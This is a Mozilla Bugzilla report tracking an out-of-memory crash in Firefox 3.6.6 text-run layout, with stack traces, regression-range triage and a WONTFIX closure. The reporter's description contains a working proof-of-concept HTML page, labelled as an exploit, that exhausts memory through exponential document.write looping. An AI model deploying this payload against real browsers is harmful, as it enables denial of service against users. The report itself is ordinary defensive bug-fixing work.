Closed
Bug 575263
Opened 14 years ago
Closed 6 years ago
Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Categories
(Core :: Layout: Text and Fonts, defect)
Tracking
()
RESOLVED
WONTFIX
Tracking | Status | |
---|---|---|
status2.0 | --- | unaffected |
status1.9.2 | --- | wanted |
People
(Reporter: r45c4l, Unassigned)
References
Details
(Keywords: crash, Whiteboard: [sg:dos OOM] maybe fixed by 565373)
Crash Data
Attachments
(1 file)
68.51 KB,
text/plain
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 [ EXPL0!T ] <html><title>Mozilla Firefox 3.6.6 Denial of Service by r45c4l </title> <script> function junk() { var buff="A"; for (i=0;i<786;i++) { buff+=buff+"A"; document.write(buff+buff); } } </script> <body onload="javascript:junk();"> <font color=green>r45c4l<font color="red">[AT]</font>hotmail<font color="green">[DOT]</font>com</font> </body> </html> Save the page as [dot]html, open it with Firefox 3.6.6. The browser will get hanged and then crash. Reproducible: Always Actual Results: Browser gets hanged and crash
Comment 1•14 years ago
|
||
No crash on - Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:1.9.3a6pre) Gecko/20100628 Minefield/3.7a6pre Crash - Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Severity: normal → major
Comment 2•14 years ago
|
||
Updated•14 years ago
|
blocking1.9.2: --- → ?
Comment 3•14 years ago
|
||
Crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 as well
OS: Windows 7 → All
Hardware: x86 → All
Attachment #454514 -
Attachment mime type: application/octet-stream → text/plain
_CxxThrowException operator new(unsigned int size = 0x692a2c0c) TextRunWordCache::MakeTextRun(0x00000003, aLength = 0xfffffc6, 0x0a6d4240, 0x0036b548, 0x1000120)+0x91 [e:\builds\moz2_slave\win32_build\build\gfx\thebes\src\gfxtextrunwordcache.cpp @ 707] MakeTextRun(0x693039ec, 0x36da30, aFontGroup = 0x00000003, 0x0a6dc720, 0) BuildTextRunsScanner::BuildTextRunForFrames BuildTextRunsScanner::FlushFrames BuildTextRuns _cairo_array_grow_by USP10!ApplyFeatures+0x645 gfxTextRun::Draw nsHTMLReflowState::InitConstraints nsContainerFrame::ReflowChild CanvasFrame::Reflow nsContainerFrame::ReflowChild nsHTMLScrollFrame::ReflowScrolledFrame nsHTMLScrollFrame::ReflowContents nsHTMLScrollFrame::Reflow nsContainerFrame::ReflowChild ViewportFrame::Reflow
Component: General → Layout: Text
Keywords: crash
Product: Firefox → Core
QA Contact: general → layout.fonts-and-text
Summary: Denial of Service in Firefox 3.6.6 → Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Version: unspecified → 1.9.2 Branch
Comment 5•14 years ago
|
||
Did a regression range on this issue Tracemonkey build from May 17th shows the issue, May 18th no longer crashes or hangs. Mozilla Central build from the 18th hangs meaning that this was fixed on Tracemonkey first. http://hg.mozilla.org/tracemonkey/pushloghtml?fromchange=e5ae28ee811b&tochange=955bfaadaebb This has two bugs bug 565229 - Bulk clear GC bitmaps when GC starts instead of after the GC ends bug 565373 - Fix recursing with inlining I suspect the second is the bug that fixed the issue.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•14 years ago
|
blocking1.9.2: ? → .8+
status1.9.2:
--- → wanted
Depends on: 565373
Whiteboard: [sg:dos OOM] fixed by 565373
Comment 6•14 years ago
|
||
I'm not sure 565373 is the fix since that appeared to be fixing a trunk regression after 3.6 branched. But we can try the patch, maybe the regression range is incorrect.
Updated•14 years ago
|
Whiteboard: [sg:dos OOM] fixed by 565373 → [sg:dos OOM] maybe fixed by 565373
sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try to check it locally as well, but you'd need to be involved anyway to land if it does fix it.
Comment 8•14 years ago
|
||
(In reply to comment #7) > sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try > to check it locally as well, but you'd need to be involved anyway to land if it > does fix it. Is this comment in the right bug?
Yes. This bug is not an issue on trunk as it was fixed in TM which later merged into m-c, and the fix range points to bug 565373 (see comment 5). We'd like bug 565373 backported to the branches if it a) actually fixes this bug's issue and b) is fairly safe. I'm looking to patch 1.9.2.9 default now with the fix from bug 565373 and test it locally, to make sure the page in comment 1 doesn't cause a crash anymore. I wouldn't be the guy to integrate or determine if we should actually take that on the branch(es) though, which is why I looped you in. If this should go to someone else, let me know.
status2.0:
--- → unaffected
Comment 10•14 years ago
|
||
...and I just realized we are already tracking bug 565373, so this should probably be closed in favor of doing everything in bug 565373 (once it is determined that this is indeed a dupe of bug 565373).
Comment 11•14 years ago
|
||
Al, I may not have time to get to this. If you have time, can you do a local build with the fix from bug 565373 to see if this should be duped off? Thanks!
Comment 12•14 years ago
|
||
My HG-fu is weak. While I build debug builds, in general, for testing, I don't know enough HG to know how to pull the patch from bug 565373 and merge it into my local repro. If someone wants to give me simple instructions on how to do it, I can build an optimized build on Windows for this.
Comment 13•14 years ago
|
||
Hmmm, doesn't look like there is a js/src/jsrecursion.cpp in 1.9.2...
Comment 14•14 years ago
|
||
Didn't we add a limit on JS string length? Was that on trunk or in 1.9.2 already?
Assignee | ||
Updated•13 years ago
|
Crash Signature: [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Comment 15•6 years ago
|
||
Closing because no crash reported since 12 weeks.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX
You need to log in
before you can comment on or make changes to this bug.
Description
•